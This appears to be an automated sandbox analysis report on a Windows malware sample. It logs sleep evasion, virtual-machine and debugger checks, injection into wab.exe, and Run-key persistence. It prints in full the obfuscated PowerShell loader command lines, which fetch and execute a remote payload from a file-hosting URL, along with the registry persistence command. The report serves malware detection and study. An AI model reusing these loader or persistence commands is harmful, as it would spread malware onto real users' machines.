Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -599655s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -599110s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -598985s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -598856s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -598727s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -598604s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -598497s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -598373s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -598265s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -598156s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -598047s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -597936s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -597816s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -597688s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -597524s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -597355s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -594532s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -594391s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -594281s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -594170s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -594063s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -593947s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -593829s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -593688s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -593563s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -593453s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -593344s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -593219s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -593109s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -593000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -592891s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -592780s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -592672s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -592563s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -592438s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -592329s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -592204s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -592079s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -591954s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -591829s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -591704s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -591579s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -591453s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -591344s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -591235s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -591110s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598856	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598727	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598604	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598497	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598373	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597936	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597816	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597524	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597355	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594532	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594391	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594281	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594170	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593947	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593829	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593688	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593563	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593453	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593344	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593219	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593109	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592891	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592780	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592672	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592563	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592438	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592329	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592204	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592079	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591954	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591829	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591704	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591579	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591453	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591344	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591235	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591110	Jump to behavior

Source: FTSKIaM.exe, 00000011.00000002.2201367521.0000000003090000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.1521192119.000001A4682BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.1521138231.000001A4663E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1521895044.000001A4663E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1520323681.000001A46635E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1522809392.000001A468530000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: FTSKIaM.exe, 00000011.00000002.2201367521.0000000003090000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000003.00000002.2240319276.000001F0A3270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllto

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 11_2_022F7818 CheckRemoteDebuggerPresent,

11_2_022F7818

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 9_2_0084DAAC LdrInitializeThunk,

9_2_0084DAAC

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe

Code function: 17_2_00A11AE4 GetProcessHeap,HeapFree,

17_2_00A11AE4

Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 17_2_00A132C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		17_2_00A132C0
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 17_2_00A13450 SetUnhandledExceptionFilter,		17_2_00A13450

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3860000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 22FF808			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Saltspoonful.Dag && echo $"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Saltspoonful.Dag && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%gam% -w 1 $Putrilaginously=(Get-ItemProperty -Path 'HKCU:\predetrimental\').Bingoer;%gam% ($Putrilaginously)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%gam% -w 1 $Putrilaginously=(Get-ItemProperty -Path 'HKCU:\predetrimental\').Bingoer;%gam% ($Putrilaginously)"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$overburdeningly = 1;$haarrddernes='substrin';$haarrddernes+='g';function blomraadne($suggestionen){$kulsyre=$suggestionen.length-$overburdeningly;for($esrogs=5; $esrogs -lt $kulsyre; $esrogs+=(6)){$bilendes+=$suggestionen.$haarrddernes.invoke($esrogs, $overburdeningly);}$bilendes;}function uudviklet($sammenstuvningerne){. ($subpellucidity) ($sammenstuvningerne);}$dulmes=blomraadne 'cha,tmranchoblomszcenteizonkmlufejll halaa ,ump/ epos5.udek.duske0delet nonad(kvindw .elgiprecintrossd.kkupoudv.kwsammesvalgb meronfili,tto.ea r gar1midta0sildd.ingra0d.ast;udann .ordbw pakki twenn .ewy6aands4 flor;f tal ori,ax syst6a.ted4in us;moloi henler ragiv tupp:trspr1corne2,ehir1pyrox.fr sk0misoc)torke ekko.g knoweafgifchillekhydroos.eln/tabul2optje0sylte1 er t0 klyn0endit1warm,0commi1glott subinfhaardimicror lipoespi nfdoledovegetxphyti/bjerg1.ntif2chilt1supre.medbo0uarb, ';$subdichotomies=blomraadne 'fraa.u anfrsdr,meesoegmrlokal-algebatid bgomd sepr ctn unmatkalpa ';$rugemaskine=blomraadne 'brillh a lht .rogtorchepneedlsmedik:strib/parel/ f icdomstbropiliiconcevauricesteps.,mertgskydeotyskeoder,ig,aterlmassee mani.imparc sibio e.evm.rogr/latteugermacatmos?gera,e rektxcnemipsommeofuldvrcentrtoplad=lepadd koldos delwstiplnarchblfrassoantipacathodunder&ph soiunbo d p.rt= k al1depolomys.addyref4revistagricvprissdgua adadipoyrever2plump-maskir,ddankhartvbatticiuoplarspirozstri.pplackcid tsyrec p_unbrons.endr sm.askar orassis7 thyrv erdimvrimltandengsjleh_gl.bulforetyrehee ';$kattelemmes=blomraadne 'trf,e>unr,c ';$subpellucidity=blomraadne ' dispiembele mergx enne ';$aluminate = blomraadne ' atriecatarc,laedhind.bosiph, rustn%t.ndra.espep,alaapfals,danimaaan istd.lirahygie%br.ne\misg staf,fanoni.lr.nsktrneres blanp hiemototalouddatnatt,sfekspouve.erl .oth.underd toldapanteg,ndos nejp& mand&amazi shareea.delclegalh baglomurha for.$parke ';uudviklet (blomraadne 'syge.$ haveghaandlge.peo paabbkdedea nshelforka:brndst,orgei absuldeltrha inauap degbodywgslethe nrklnprikkd op.semegal=dread(v,melccrescmdurwaddiffu sickl/,rgancl rdo kant.$korrearingdlstnd u w,gomnon ei.redinlun.eaunwort brn.e baga)brynj ');uudviklet (blomraadne 'o.ert$brudegbedralnig,rononprbbiosyaatomil mail:battllmi.isevictua kiskna.tioeren.rr adve=li sf$emnetrpastouomf,vghypere jo.om nnuea embes talmkresmiiling.n uvureafled.mystistrevlpfightlklokkitheomtbom,e(bowpo$exp.lk ladfaemanatph not p toesvngnl,aranehackemgibbim,andierai ls cere)wrath ');$rugemaskine=$leaner[0];uudviklet (blomraadne ' trof$ pringscrewl etouoamidobfi.erablgfrltaste: 